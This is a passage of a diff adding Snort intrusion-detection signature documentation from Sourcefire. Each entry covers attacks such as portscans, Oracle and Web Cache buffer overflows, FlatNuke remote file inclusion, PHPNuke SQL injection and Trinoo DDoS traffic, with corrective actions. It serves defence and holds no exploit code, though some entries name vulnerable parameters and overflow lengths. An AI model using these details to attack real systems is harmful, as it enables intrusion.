+
+--
+Affected Systems:
+	Windows hosts.
+
+--
+Attack Scenarios:
+An attacker may be attempting to access files located on the C drive of 
+the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Netbios access from external networks (tcp port 139).
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS339
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;100517
+
+--
--- /dev/null
+++ b/doc/signatures/122-21.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-21
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a udp
+filtered portscan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/2455.txt
@@ -0,0 +1,52 @@
+Rule:
+
+--
+Sid:
+2455
+
+--
+Summary:
+This event is generated when a host in your network that has Yahoo Instant Messenger running has sent a message to a Yahoo IM conference.
+
+--
+Impact:
+Possible policy violation.  Instant Messenger programs may not be appropriate in certain network environments.
+
+--
+Detailed Information:
+A Yahoo IM conference allows multiple users to participate in the exchange of text and voice messages, as well as share files and webcams.  It is possible that a file that is exchanged may contain malicious code such as as virus, worm, Trojan, or backdoor.  Also, since all exchanges are done via Yahoo IM servers and in clear text, there should be no expectation of privacy.
+
+--
+Affected Systems:
+Any host running Yahoo Instant Messenger.
+
+--
+Attack Scenarios:
+A Yahoo IM user may unwittingly accept a malicious file.
+
+--
+Ease of Attack:
+Easy to transfer a malicious file.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+It may be possible for Yahoo IM traffic to use other ports than the default expected ones.  
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+--
+Additional References:
+Yahoo Protocol
+http://www.cse.iitb.ac.in/~varunk/YahooProtocol.htm
+
+--
--- /dev/null
+++ b/doc/signatures/2835.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2835
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure purge_master_log
+. This procedure is included in
+sys.dbms_repcat_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/121-3.txt
@@ -0,0 +1,98 @@
+
+
+Rule:
+
+--
+Sid:
+121-3
+
+--
+Summary:
+This event is generated when the pre-processor flow-portscan detects
+network traffic that may constitute an attack. Specifically a fixed
+scale talker limit exceeded event was generated.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the flow-portscan pre-processor detects
+network traffic that may consititute an attack.
+
+The flow-portscan pre-processor uses a flow based technique to identify
+portscanning in one-to-many and many-to-one scenarios based on flow
+creation in the flow pre-processor.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.flow-portscan in the docs directory
+of the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+detailed instructions and examples on how to tune and use the
+pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Chris Green <cmg@snort.org>
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/100000840.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000840
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "FlatNuke" application running on a webserver. Access to the file "index.php" using a remote file being passed as the "mod" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "mod" parameter in the "index.php" script used by the "FlatNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using FlatNuke
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2662.txt
@@ -0,0 +1,54 @@
+Rule: 
+
+--
+Sid: 
+2662
+
+-- 
+Summary: 
+This rule is intended to increase the accuracy of rules designed to
+generate events based on attempts to exploit implementations of Secure
+Socket Layer (SSL) version 2.
+
+-- 
+Impact: 
+None. This is a protocol decode rule that does not generate events.
+
+--
+Detailed Information:
+This is a protocol decode rule that does not generate events.
+
+--
+Affected Systems:
+NA
+
+--
+Attack Scenarios: 
+NA
+
+-- 
+Ease of Attack: 
+NA
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+NA
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/329.txt
@@ -0,0 +1,65 @@
+Rule: 
+
+--
+Sid: 329
+
+-- 
+Summary: 
+This is an intelligence gathering activity. This event is indicative of a connection laundering attack against the finger daemon
+
+-- 
+Impact: 
+The attacker may obtain information about a third party host without making a direct connection to that host.
+
+--
+Detailed Information:
+The event is generated when an attempt to use a machine to run
+finger queries against a third party UNIX system is attempted by the
+Cybercop vulnerability scanner. 
+
+The attack utilizes "finger forwarding" functionality, normally used to forward queries to a third party machine. The information is obtained without a direct connection to the said third party, since the target system performs a connection to the third party host for the attacker. 
+
+The Finger daemon is used to provide information about users on a UNIX system. It used to be installed and enabled by default on most UNIX/Linux systems. The attack if successful, will confirm that the target host will try to forward queries.
+
+--
+
+Attack Scenarios: 
+An attacker uses the Cybercop vulnerability scanner to test for this weakness.
+
+-- 
+
+Ease of Attack: 
+Simple, performed by a scanner
+
+-- 
+
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+
+Corrective Action: 
+Disable the finger daemon or upgrade to a daemon without finger forwarding functionality
+
+
+--
+Contributors: 
+Original rule written by Max Vision <vision@whitehats.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0105
+
+Arachnids:
+http://www.whitehats.com/info/IDS11
+
+--
--- /dev/null
+++ b/doc/signatures/2036.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2036
+
+--
+Summary:
+Network Status Monitor (NSM) is used to indicate whether a host is up or
+for its status.
+
+--
+Impact:
+Intelligence gathering about the current state of a host and whether rpc
+services are available.
+
+--
+Detailed Information:
+NSM runs on client machines and informs other hosts of the status of 
+that machine should a crash or reboot occur. Each remote application 
+using an rpc service can therefore register with the host when services 
+are once again available.
+
+A request made to a machine will indicate to the attacker the status of 
+that host and will also be indicative of rpc services being available. 
+The attacker might then continue to ascertain which rpc services are 
+being offered and then launch an attack on vulnerable daemons.
+
+--
+Affected Systems:
+Any system running the service.
+
+--
+Attack Scenarios:
+An attacker merely needs to request the status of the host using rpc.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+Use the hosts.allow file to restrict the hosts able to request the 
+status of the server.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Network Status Monitor Protocol, The Open Group:
+http://www.opengroup.org/onlinepubs/009629799/chap11.htm
+
+--
--- /dev/null
+++ b/doc/signatures/2654.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2654
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the web application PHPNuke.
+
+--
+Impact:
+SQL Injection is possible leading to a complete compromise of the data
+in the application database.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHPNuke web application running on a server.
+
+Insufficient checks are made on user input supplied to the script
+"viewtopic.php", exploitation of this issue could present an attacker
+with the opportunity to inject SQL code of their choosing into a
+vulnerable system.
+
+--
+Affected Systems:
+	PHPNuke 6.0
+	PHPNuke 6.5 RC2
+
+--
+Attack Scenarios:
+An attacker can supply code of their choice by including it in the
+URI that calls on viewtopic.php.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Consider reviewing the database permissions for the application.
+
+--
+Contributors:
+Sourcefire Research Team
+Ricky MacAtee <rmacatee@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2559.txt
@@ -0,0 +1,71 @@
+Rule: 
+
+--
+Sid: 
+2559
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Oracle Application Server Web Cache.
+
+-- 
+
+Impact: 
+Serious. Possible execution of arbitrary code leading to remote
+administrative access.
+
+--
+Detailed Information:
+The Oracle Application Server Web Cache is vulnerable to a buffer
+overrun caused by poor checking of the length of an HTTP Header. If a
+large invalid HTTP Request Method is supplied to a vulnerable system, an
+attacker may be presented with the opportunity to overrun a fixed length
+buffer and subsequently execute code of their choosing on the server.
+
+--
+Affected Systems:
+Oracle Application Server Web Cache 10g 9.0.4 .0
+Oracle Oracle9i Application Server Web Cache 2.0 .0.4
+Oracle Oracle9i Application Server Web Cache 9.0.2 .3
+Oracle Oracle9i Application Server Web Cache 9.0.2 .2
+Oracle Oracle9i Application Server Web Cache 9.0.3 .1
+
+--
+
+Attack Scenarios: 
+An attacker might supply an HTTP Request Method of more than 432 bytes,
+causing the overflow to occur.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives:
+None Known
+
+--
+False Negatives:
+This rule examines Oracle Web Cache server on port 7777 or 7778.  It is possible
+to configure the Oracle Web Cache server to run on different ports.  The rule
+should be configured to reflect the appropriate ports of Oracle Web Cache
+servers on your network.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000848.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+100000848
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "PhpWebGallery" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "keyword" parameter in the "comments.php" 
+script 
+used by the "PhpWebGallery" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using PhpWebGallery
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Chris Jacob <chris.jacob@sourcefire.com>
+
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/232.txt
@@ -0,0 +1,70 @@
+Rule:
+--
+Sid:
+232
+
+--
+Summary:
+This event is generated when a pong packet for the Trinoo (aka trin00) 
+DDos suite is detected.
+
+--
+Impact:
+This may indicate a compromised system or be the prelude to a
+Distributed Denial of Service (DDoS) attack.
+
+--
+Detailed Information:
+Once a Trinoo client has been installed on a compromised machine and a master is
+ready and listening, the master sends a "png" (ping) command to its drones in 
+an attempt to enumerate the drone network. A functioning client will respond to 
+port 31335/udp with the text "PONG".
+
+Once a machine becomes part of a trin00 network, a Denial of Service (DoS) 
+is typically initiated against one (or more) victim machines.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+As part of a large scale attack against a machine or a network, an
+attacker will compromise large numbers of machines which will form the
+army that the trin00 master daemon will command.  The master daemon
+typically instructs the clients to send mass-quantities of packets to
+a set of victim hosts.  If the traffic is sufficient, the victim
+machines will become resource deprived and thus endure a DoS condition.
+
+--
+Ease of Attack:
+Simple. Trinoo client and master programs are widely available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disconnect infected machine(s) from the network immediately.
+
+Use software to determine if a host has been compromised using a
+rootkit.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Jon Hart <warchild@spoofed.org>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+SANS:
+http://www.sans.org/newlook/resources/IDFAQ/trinoo.htm
+
+--
--- /dev/null
+++ b/doc/signatures/2312.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2312
+
+--
+Summary:
+This event is generated when suspicious shell code is detected in
+network traffic.
+
+--
+Impact:
+Denial of Service (DoS) possible execution of arbitrary code.
+
+--
+Detailed Information:
+This event is generated when suspicious shell code is detected. Many
+buffer overflow attacks contain large numbers of NOOP instrucions to pad
+out the request. Other attacks contain specific shell code sequences
+directed at certain applications or services.
+
+The shellcode in question may also use Unicode encoding.
+
+--
+Affected Systems:
+	Any software running on x86 architecture.
+
+--
+Attack Scenarios:
+An attacker may exploit a DCERPC service by sending shellcode in the RPC
+data stream. Sending large amounts of data to the Microsoft Workstation
+service can cause a buffer overflow condition in the logging function
+thus presenting an attacker with the opportunity to issue a DoS attack
+or in some cases, to execute code of their choosing.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+False positives may be generated by binary file transfers.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Make sure the target host has all current patches applied and has the
+latest software versions installed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2871.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2871
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority_nchar
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1537.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1537
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2081.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+2081
+
+--
+Summary:
+number for the rpc service xfsmd
+
+--
+Impact:
+Intelligence gathering
+
+--
+Detailed Information:
+This may be an attacker probing for vulnerable versions of rpc services.
+In this case, the rpc service xfsmd.
+
+It is possible for an attacker to supply a meta character followed by
+any commands or code of his choosing to the xfsmd daemon.
+
+Due to a programming error, the service does not correctly check for the
+characters and they are not stripped from the request.
+
+The xfsmd daemon is not installed by default on IRIX systems but it is 
+part of an optional package.
+
+--
+Affected Systems:
+	IRIX 6.2
+	IRIX 6.3
+	IRIX 6.4
+	IRIX 6.5.x
+
+--
+Attack Scenarios:
+Exploits are widely available.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Patches are NOT available for this issue.
+
+Disable and remove the xfsmd daemon.
+
+Uprade to the latest non affected version of the operating system
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/5075
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0359
+
+SGI IRIX:
+ftp://patches.sgi.com/support/free/security/advisories/20020606-01-I
+
+--
--- /dev/null
+++ b/doc/signatures/2235.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+2235
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow in Trend Micro InterScan eManager.
+
+--
+Impact:
+Serious. Remote administrative access is possible.
+
+--
+Detailed Information:
+Versions of Trend Micro InterScan eManager suffer from a buffer overflow
+condition that can present an attacker with the opportunity to execute 
+arbitrary code of their choosing which could lead to remote access to 
+the server.
+
+--
+Affected Systems:
+	Trend Micro InterScan eManager 3.51
+
+--
+Attack Scenarios:
+If the buffer overflow condition is met, the attacker can run code of 
+their choosing on the affected host.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Disable the web interface
+
+Enable NTLM authentication for the administrative interface
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/3327
+
+--
--- /dev/null
+++ b/doc/signatures/491.txt
@@ -0,0 +1,63 @@
+Rule:  
+--
+Sid:
+491
+
+--
+Summary:
+This event is generated when a failed attempt to login to an FTP server
+is detected.
+
+--
+Impact:
+Unknown. Multiple events may indicate an attempt to enumerate accounts
+and passwords using brute force methodology.
+
+--
+Detailed Information:
+This event is generated when a failed attempt to login to an FTP server
+is detected.
+
+Multiple events may indicate an attempt to enumerate accounts
+and passwords using brute force methodology.
+
+--
+Affected Systems:
+	All FTP Servers
+ 
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Check FTP logs for access attempts.
+
+Disallow FTP access from sources external to the protected network.
+
+Consider using Secure Shell as a replacement for FTP services.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+RFC:
+http://www.faqs.org/rfcs/rfc959.html
+
+--
--- /dev/null
+++ b/doc/signatures/1261.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1261
+
+--
+Summary:
+This event is genereated when an attempt to overflow the buffer of the
+IBM Program Database Name Server Daemon (PDNSD) is made.
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity
+to gain remote access to the victim host or execute arbitrary code with
+the privileges of the superuser account.
+
+--
+Detailed Information:
+Some versions of IBM PDSND for AIX are vulnerable to a buffer overflow
+condition which can present the attacker with root privileges.
+
+
+Affected Systems:
+	PDSND versions 2 and 3
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Disable the PDSND daemon.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CIAC:
+http://www.ciac.org/ciac/bulletins/j-059.shtml
+
+--
--- /dev/null
+++ b/doc/signatures/2460.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2460
+
+--
+Summary:
+This event is generated when a host in your network that has Yahoo 
+Instant Messenger running requests to view a webcam listen to an audio 
+message of another Yahoo IM user. 
+
+--
+Impact:
+Possible policy violation.  Instant Messenger programs may not be 
+appropriate in certain network environments.
+
+--
+Detailed Information:
+This event indicates that a Yahoo IM user in your network is requesting 
+to view a webcam or listen to an audio message of another Yahoo IM user.
+While there are no known exploits associated with showing or viewing 
+webcams, it is possible that this activity is inappropriate in certain 
+environments.
+
+--
+Affected Systems:
+Any host running Yahoo Instant Messenger.
+
+--
+Attack Scenarios:
+No known attack scenarios.
+
+--
+Ease of Attack:
+No known attack scenarios.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+It may be possible for Yahoo IM traffic to use other ports than the 
+default expected ones.  
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or 
+implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+--
+Additional References:
+Yahoo Protocol
+http://www.cse.iitb.ac.in/~varunk/YahooProtocol.htm
+
+--
--- /dev/null
+++ b/doc/signatures/2241.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2241
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerablity in NetWin CWMail 2.7.
+
+--
+Impact:
+Serious. Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+Certain versions of NetWin CWMail suffer from a buffer overflow 
+condition that can present an attacker with the opportunity to execute 
+code of their choosing on the server.
+
+--
+Affected Systems:
+	NetWin CWMail 2.7, a, b, c, d, f, i, j, k, l, m, n, o, p, q, s and t
+	
+--
+Attack Scenarios:
+The attacker would need to supply a large amount of characters to the
+"item=" parameter which could then cause the overflow condition to
+occur.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/4093
+
+--
--- /dev/null
+++ b/doc/signatures/1617.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1617
+
+--
+Summary:
